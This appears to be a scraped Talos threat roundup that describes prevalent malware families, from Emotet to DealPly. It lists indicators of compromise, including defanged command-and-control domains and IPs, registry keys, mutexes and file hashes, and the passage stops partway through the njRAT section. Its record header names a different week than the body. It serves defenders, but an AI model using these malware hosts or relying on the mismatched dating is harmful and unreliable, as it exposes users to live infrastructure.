Record metadata: modified 2020-02-14T11:35:23, published 2020-02-14T11:35:23, id TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A, source <http://feedproxy.google.com/~r/feedburner/Talos/~3/3m6HBreCgdU/threat-roundup-0207-0214.html>, type talosblog, title "Threat Roundup for February 7 to February 14", CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).

* * *

Next record: lastseen 2020-01-31T21:28:03, bulletinFamily blog, cvelist CVE-2019-0708.

[Threat Roundup header image](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 24 and Jan. 31. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/01/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
---|---|---
Doc.Downloader.Emotet-7561073-0 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Ransomware.TeslaCrypt-7561199-1 | Ransomware | TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransom, and eventually the malware developers released the master key, allowing all encrypted files to be recovered easily.
Win.Malware.Cerber-7561026-0 | Malware | Cerber is ransomware that encrypts documents, photos, databases and other important files. 
Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns other file extensions are used. \nWin.Packed.njRAT-7561028-1 | Packed | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014. \nWin.Packed.Kuluoz-7561668-1 | Packed | Kuluoz, sometimes known as \"Asprox,\" is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations. \nWin.Trojan.SmokeLoader-7562031-1 | Trojan | SmokeLoader is malware primarily used to download and execute additional malware. Read more about this threat on our blog at https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html. \nWin.Malware.Nymaim-7565328-1 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads. \nWin.Packed.ZBot-7563206-1 | Packed | Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods like key-logging and form-grabbing. \nPUA.Win.File.Dealply-7563212-0 | File | DealPly is an adware program that installs an add-on for web browsers and displays malicious ads. 
\n \n* * *\n\n## Threat Breakdown\n\n### Doc.Downloader.Emotet-7561073-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: Type ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: Start ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: ErrorControl ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: ImagePath ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: DisplayName ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: WOW64 ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: ObjectName ` | 5 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 5 \n`Global\\M98B68E3C` | 5 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`100[.]98[.]237[.]179` | 15 \n`100[.]100[.]159[.]93` | 15 \n`100[.]67[.]234[.]62` | 15 \n`100[.]121[.]59[.]233` | 15 \n`100[.]105[.]91[.]145` | 15 \n`186[.]138[.]186[.]74` | 5 \n`35[.]203[.]98[.]50` | 5 \n`35[.]214[.]151[.]75` | 5 \n`173[.]194[.]205[.]108/31` | 3 \n`51[.]77[.]113[.]100` | 3 \n`190[.]24[.]243[.]186` | 3 \n`176[.]9[.]47[.]53` | 2 \n`193[.]70[.]18[.]144` | 2 \n`17[.]36[.]205[.]74` | 2 \n`74[.]202[.]142[.]71` | 2 \n`86[.]96[.]229[.]29` | 2 \n`74[.]202[.]142[.]33` | 2 \n`200[.]44[.]32[.]43` | 2 \n`74[.]202[.]142[.]51` | 2 \n`172[.]217[.]6[.]211` | 2 \n`196[.]43[.]2[.]142` | 2 \n`123[.]58[.]177[.]239` | 2 \n`74[.]202[.]142[.]25` | 2 \n`94[.]23[.]252[.]181` | 2 \n`185[.]224[.]136[.]6` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`cliniquefranceville[.]net` | 20 \n`institutpediatriesociale[.]com` | 20 \n`cool-game[.]info` | 15 \n`abakonferans[.]org` | 15 \n`cnarr-tchad[.]org` | 15 \n`imail[.]dahnaylogix[.]com` | 2 \n`smtp[.]prodigy[.]net[.]mx` | 2 \n`smtp[.]amilcargo[.]com` | 2 \n`smtp[.]infinitummail[.]com` | 2 \n`mail[.]cantv[.]net` | 2 \n`smtp[.]alestraune[.]net[.]mx` | 2 \n`smtp[.]saix[.]net` | 2 \n`smtp[.]dsl[.]telkomsa[.]net` | 2 \n`gwsmtp[.]lgdisplay[.]com` | 2 \n`smtp[.]pangia[.]biz` | 2 \n`mail[.]suntakpcb[.]com` | 2 \n`smtp[.]grupobiblioteca[.]es` | 2 \n`mail[.]1und1[.]de` | 1 \n`smtp[.]mail[.]pjud` | 1 \n`mail[.]ofsnt[.]com` | 1 \n`smtp[.]svacv[.]es` | 1 \n`smtp[.]roteisa[.]es` | 1 \n`mail[.]ebrou[.]az` | 1 \n`mail[.]assets[.]cl` | 1 \n`hotelancor[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\976.exe` | 20 \n`%TEMP%\\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp` | 17 \n`%TEMP%\\tst7C.tmp` | 1 \n`%TEMP%\\tstBC.tmp` | 1 \n`%TEMP%\\tstE.tmp` | 1 \n \n#### File Hashes\n\n` 020514ef776f7380cafd8d2999591c75e0d476fc139450d9ac6fdfe09dd7ae87 0b77b17216fc7fb3b5de978762f07a063f722709597d0444aa2625123b8925a8 25efcc40c30bdfc1415f61c5fa2da3a569c7f4a511933bb0b898292367ca6804 2ef37c6a7f53e69a4e81613d72c21e1bc4413d4c3ebfbdb59f4c5a43b7233ae2 339e0f2df55ba72558ab93082fbb5ef218fe8527611c2c1961a4506d7c6521c4 44713e481564f2ce7a930e43bcdda80390718b92301f85cb575098959de0f6e1 44b91893a8d2d4df847664829c426f8fa0f1f3b565b0614bcf958e18795bf144 44bcf15f4888850c235f6e5e7b88bb357a3be71e4b8b22cf9cbaa7ecadbce81c 52c9a08e9df80b7b3ee5dcba625f097da1ad214cad2fb488dd4ff5296f598a4d 544b49bce1aeac4879cdcd5526cab45257ada596d9a32b3cbd254b7cb5bab381 6591f298762dac4578f9a738d736e65002adb412139af02c8cdf129ea1eb96ad 6cfb6058d1b0f8aa7927a40680c7fcd88e0c3f67cdfc2b271af7823dd89754a3 70084c2ceb78bd84337fbbfdb4765d5cfcf58a003b9d39b07c4e1ca9e7e1291d 
7d6b5fa35c763390dc6187b13dae9d0248b6adacdd1b3ecd57dabd29e6aeca22 b072a08b5c35f8fb107b90ee815584ac4f7b24bd6ae30a803717f1f3fdfbeaea ca7b1a3d7db2feeb5548928ff6adb85fdb993b11795f88fed56ec7649beef850 d4b2aaebb6b4c3413610303cd78a4c7a3c57d6d269e775421881f48d7e37b898 d97abe68b3f17ac6ed03f44542568c5fc3f1586ff71a618202a6d045ed296ccf f44dadeff2a79d2ce69d0e7f8c63b7fac1bd972306dc7f803440a6378b9af58c fa60f451bb2be89d13963f75bcfc165868a5fa32d9752debbf2f077916884ac5 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-B8gXyuA4_38/XjR_Mq3WdGI/AAAAAAAADMY/FenvfmcH_hwTpkzTnszF9oTbnLfeNNb8ACLcBGAsYHQ/s1600/25efcc40c30bdfc1415f61c5fa2da3a569c7f4a511933bb0b898292367ca6804_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-kG2S95O66eQ/XjR_Qjdx-RI/AAAAAAAADMc/QkbkLDeGilouHUe2UwCh9zZIhKisqfESwCLcBGAsYHQ/s1600/25efcc40c30bdfc1415f61c5fa2da3a569c7f4a511933bb0b898292367ca6804_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-Eg62KOZTbZc/XjR_VGsmjUI/AAAAAAAADMg/TAr9Xw7BMYwN5z1cd6Czq8r2OxPY5uNCwCLcBGAsYHQ/s1600/020514ef776f7380cafd8d2999591c75e0d476fc139450d9ac6fdfe09dd7ae87_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.TeslaCrypt-7561199-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLinkedConnections ` | 21 \n`<HKCU>\\SOFTWARE\\XXXSYS ` | 21 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 \nValue Name: CheckSetting ` | 21 \n`<HKCU>\\SOFTWARE\\XXXSYS \nValue Name: ID ` | 21 \n`<HKCU>\\Software\\<random, matching '[A-Z0-9]{14,16}'> ` | 21 \n`<HKCU>\\Software\\<random, matching '[A-Z0-9]{14,16}'> \nValue 
Name: data ` | 21 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 20 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: clycoowjblev ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: xcdjaxwnjnyv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: kdkrjkoxcoox ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: jylmwtguxgkt ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ookfknruoagc ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: kjayrvnavhux ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: xlfrocgqtuck ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: rjopbftidbxn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: untudrlkcqaf ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: exoxvooruudo ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: itbqxmjmhgli ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ngtpiwrksqfm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ajcdjvtakwtb ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: nhflhnkqeiix ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: sllccxaietxc ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: tauqjbughujc ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: pdfnqsbitrak ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: awjcujlsmtrl ` | 1 \nMutexes | Occurrences \n---|--- \n`ityeofm9234-23423` | 21 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`204[.]11[.]56[.]48` | 21 \n`109[.]73[.]238[.]245` | 21 \n`85[.]128[.]188[.]138` | 21 \n`162[.]241[.]224[.]203` | 21 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`en[.]wikipedia[.]org` | 21 \n`www[.]torproject[.]org` | 21 \n`tt54rfdjhb34rfbnknaerg[.]milerteddy[.]com` | 21 \n`gwe32fdr74bhfsyujb34gfszfv[.]zatcurr[.]com` | 21 \n`tes543berda73i48fsdfsd[.]keratadze[.]at` | 21 \n`music[.]mbsaeger[.]com` | 21 \n`surrogacyandadoption[.]com` | 21 \n`imagescroll[.]com` | 21 \n`worldisonefamily[.]info` | 21 \n`biocarbon[.]com[.]ec` | 21 \n`stacon[.]eu` | 21 \nFiles and or directories created | Occurrences \n---|--- \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I0ZU5JT.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I478AKJ.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I4FI238.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I4FKVBH.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I4QK3KJ.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I5QX7W9.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I77RW1L.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I7J37KF.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I9NSD58.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IANXEE8.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IC5NB1M.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$ID60W3E.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IIUTK07.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IJE160U.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IKAVPAE.txt` | 21 
\n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IL2NS3P.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$INKC8CM.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IP8M1EE.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IPDP9E0.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$ISIYA4I.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IV54ALI.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IWK2JPN.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IWYYKMD.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IXC3P46.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IZ7KADN.txt` | 21 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0bdadbb588f8cfc714bec1feb439cd5e06ebbfe33a1cb5676faad4d85304dd0b 11a166c4e1ecbe40cfc39cc03c57aafe2f812f2187a0a0d1e27c03ac932c869c 23d00f9302a58aa9903bafc850ed358fab58eb2ef82b8aa07515c22a558d23b7 335db66a2abb1f82bd92f5b6cd74722b9d5cf209beac6dcb2eefde17603d6a99 42b4d5ce541c8784936ece2082690368223730d112f108aa8d810192c54455d9 50e2f2c53166d6cb2466aa679a2917c71c6f65eb3348d350d2e38b3aeb738ddd 6d3e58844146e35ef586f8ec5b1d470a95cf360578e1d9c8aa9e012a736dd8f3 7edeacf55c94647b6826b71e08517702712d11ac41e7e5f14957812d1c9492a5 921ebcefaff3b70bf0cdd963a1442b172ac92872d4fcf757594a5998c49404cc 9482d8782e4cdefabd0d2e14645924fa508b4d49173861360db2d3d8099b713d 9d9d7709dcb74cbb2715375e4eea839263b1dd497bb27a3c8a6ada0c10aca1b3 9f7a453c5814a6ad35b0c227e97b8a1635e9b75d779c4955ff484645857f54bb b1c341cf5a3a405102e80a476986dc624e580b2d314fb80b93e967713790268a b3e5577ffd2705637a709a961aa9add3822eacd9d492b081385b1a5ac21dd34d c2d69d1b4e4977cbc97108ca5818e6fcfed517f3480b441726d6f75ac7962d84 ca6f903670b80305f33bb4b2431a8fa5c75fd59ac3938f06cf2826a98224be57 d2bcb8683986f9f06f38569c4402804cee939f56a90b40078b819e324400eb53 
dec2f3b1b9b450843c1a9a4e8a368b325356f13ab1460ee3591525aae651e3d7 eb8c433674c2ae7030f0eca0bc639abb7f9dc79077cd1be6734edc31f6208a26 ef4c0401795082d5ac654c97254401435d2f844c80cdf4b9ed4ac1601ac37061 f5aae66779652b5b4abfe575f5d7f9c1f57deb2127a21e6031b01c16b148ccee `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-d9i_o-MOJ78/XjR_idkKGBI/AAAAAAAADMs/bNvOFS0S8EYNGhomca50M2qmNKLCgj6BQCLcBGAsYHQ/s1600/c2d69d1b4e4977cbc97108ca5818e6fcfed517f3480b441726d6f75ac7962d84_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-2wsyxKuEQPE/XjR_lTYkUHI/AAAAAAAADM0/aL_YXMclYekKeYpnAw9C6s6jA2eehLumwCLcBGAsYHQ/s1600/c2d69d1b4e4977cbc97108ca5818e6fcfed517f3480b441726d6f75ac7962d84_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Cerber-7561026-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES \nValue Name: DefaultTokenId ` | 19 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES ` | 19 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 25 \n`shell.{<random GUID>}` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`31[.]184[.]234[.]0/25` | 25 \n`104[.]20[.]20[.]251` | 8 \n`104[.]20[.]21[.]251` | 6 \n`104[.]24[.]104[.]254` | 4 \n`104[.]24[.]105[.]254` | 3 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`en[.]wikipedia[.]org` | 19 \n`www[.]collectionscanada[.]ca` | 19 \n`alpha3[.]suffolk[.]lib[.]ny[.]us` | 19 \n`www[.]archives[.]gov` | 19 \n`www[.]vitalrec[.]com` | 19 \n`www[.]cdc[.]gov` | 19 \n`api[.]blockcypher[.]com` | 10 \n`btc[.]blockr[.]io` | 10 \n`chain[.]so` | 7 \n`xxxxxxxxxxxxxxxx[.]xxxxxxxxxxxx[.]xxx` | 2 \n`vyohacxzoue32vvk[.]v0xn1i[.]bid` | 1 \n`vyohacxzoue32vvk[.]7jrv53[.]bid` | 1 \n`vyohacxzoue32vvk[.]jtdcph[.]bid` | 1 \n`vyohacxzoue32vvk[.]lpnef4[.]bid` | 1 \n`vyohacxzoue32vvk[.]patchmans[.]gdn` | 1 \n`vyohacxzoue32vvk[.]8g1k17[.]bid` | 1 \n`vyohacxzoue32vvk[.]goodslet[.]win` | 1 \n`vyohacxzoue32vvk[.]23fvxw[.]bid` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\d19ab989\\4710.tmp` | 25 \n`%TEMP%\\d19ab989\\a35f.tmp` | 25 \n`\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\README.hta` | 20 \n`%ProgramFiles(x86)%\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\README.hta` | 20 \n`%APPDATA%\\Microsoft\\Access\\README.hta` | 20 \n`%APPDATA%\\Microsoft\\Outlook\\README.hta` | 20 \n`%HOMEPATH%\\Desktop\\README.hta` | 20 \n`%HOMEPATH%\\Documents\\Outlook Files\\README.hta` | 20 \n`%HOMEPATH%\\Contacts\\README.hta` | 19 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.bmp` | 19 \n`%APPDATA%\\Adobe\\Acrobat\\9.0\\README.hta` | 16 \n`<dir>\\<random, matching [A-Z0-9\\-]{10}.[A-F0-9]{4}> (copy)` | 10 \n \n#### File Hashes\n\n` 000315b74577c50c57b6572c33312f1911d3d55df50674a87ee95d88a3c0b1b2 011b56e8a271ce8853e3f3e61079c2f62ceab0424a2995fdb3c3f165d2e48666 016aecdd057f2a3881726fde3b86d252062b8891d37822b0dd48ba62ee258dbf 01a0d960c7d6cae948631473f5b39c85b490c83a362d1eeb5f36a5908127389f 040587bdd329f4db15db6f24162691421069e38324b38275449db69ac2cf2029 0430c8f48d38780eba6e1d1b31a80b9c27f3c2bc5507cee74f352546ef07fe7a 0458432198b913f1bf1180e489186297d510550ce908e1dae163a7163a7ade3f 04b76f05a328d0c650141e82da5dbecb4b8d6f0c9c1c7ad83fd111c1f915a0cc 
08561dd16308a0871e531a56e834ef0feeafff902901ef7114f5901ee68735db 09172c06a88ed355a772a24f06657e126809dbd61d4b1dda3ad274fb6c7b28fa 0d6c99690789fb5c3a8f8e9f384a34e9da251533910e89df6fcd9098c5edc042 0d909f449bc71cf5ff20077c20215f0b0b358b9f7c1f6baea8fd0592e376248f 0e2aa56da62c5a9bddef4a0162ad5522b0530d2470a0aa9c39ef2c781c0f3672 0fc0d6c7c8b0661db73de058f1f30432d4fef0670dcf5a2f9416f7e2c723cfd1 0fea5d0606a587c7bfb985fbd896ac6cb4fcd6663538a8a5d1760a3171380834 1025c58e7ffef3535b7fb89a900ee09cfecfd11af644f0f5155a832dafd9a02c 1142746bc626e5ee64430de62de2b1383f193d84f4b7044ab67236c427600099 1658371db7a7e52a191522322cda7fe93d093b54e2e8cba65a5adae91a3f5bf1 17ff4c8f632ca8e4a9200e9a68f46a6d3440cac2dd7c8c4e8e1698291e8c7cd1 18192e9bffb8e02b8a3c7540f0d33d14d0f49464adaec86d86f5477a55694eb0 19f56bfaf4437ae7fc227ad695d16adc7d94a91ebf092cbac0e406e421d7c48a 1a1378b871bb6d0a00fe3c6e151d5510f28d92b00ed87031916247b91e13a216 1b7962b03eb0e7fb25f9f31d20d263e3ef6603623f8e0efc94a91a00f9b1b3f1 1bf19b2a823abd555002380c9fc5fc932c2e66826d1c949ac96050d51924ab41 1c018281e339f735fde9edb9180f3f08181f34226aefd3d43d8de6874bdd77c4 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-kK3VjA1P974/XjSC3fogBEI/AAAAAAAADNE/Z1sNrFRlN4cihHpih8dvo51-T6-VXYWOQCLcBGAsYHQ/s1600/1b7962b03eb0e7fb25f9f31d20d263e3ef6603623f8e0efc94a91a00f9b1b3f1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-do4BTODdQjI/XjSC6zoggEI/AAAAAAAADNI/qXuK8NEewnwbWv0sr3ijlc-sLOSlZH0bQCLcBGAsYHQ/s1600/1b7962b03eb0e7fb25f9f31d20d263e3ef6603623f8e0efc94a91a00f9b1b3f1_tg.png>)\n\n \n\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.njRAT-7561028-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\ENVIRONMENT \nValue Name: 
SEE_MASK_NOZONECHECKS ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 5cd8f17f4086744065eb0992a09e05a2 ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 5cd8f17f4086744065eb0992a09e05a2 ` | 3 \n`<HKCU>\\SOFTWARE\\C2405709A54EC95CDDCC5C598F34081C ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: c2405709a54ec95cddcc5c598f34081c ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: c2405709a54ec95cddcc5c598f34081c ` | 3 \n`<HKCU>\\SOFTWARE\\C2405709A54EC95CDDCC5C598F34081C \nValue Name: [kl] ` | 3 \n`<HKCU>\\SOFTWARE\\61EA4210CF20153E16C66B613536B9E0 ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 61ea4210cf20153e16c66b613536b9e0 ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 61ea4210cf20153e16c66b613536b9e0 ` | 2 \n`<HKCU>\\SOFTWARE\\61EA4210CF20153E16C66B613536B9E0 \nValue Name: [kl] ` | 2 \n`<HKCU>\\SOFTWARE\\C550D26EE8BEBB2D926652BE861588B2 ` | 2 \n`<HKCU>\\SOFTWARE\\C550D26EE8BEBB2D926652BE861588B2 \nValue Name: hp ` | 2 \n`<HKCU>\\SOFTWARE\\C550D26EE8BEBB2D926652BE861588B2 \nValue Name: i ` | 2 \n`<HKCU>\\SOFTWARE\\C550D26EE8BEBB2D926652BE861588B2 \nValue Name: kl ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: c550d26ee8bebb2d926652be861588b2 ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: c550d26ee8bebb2d926652be861588b2 ` | 2 \n`<HKCU>\\SOFTWARE\\ADOBE\\ACROBAT READER\\9.0\\AVGENERAL \nValue Name: bLastExitNormal ` | 1 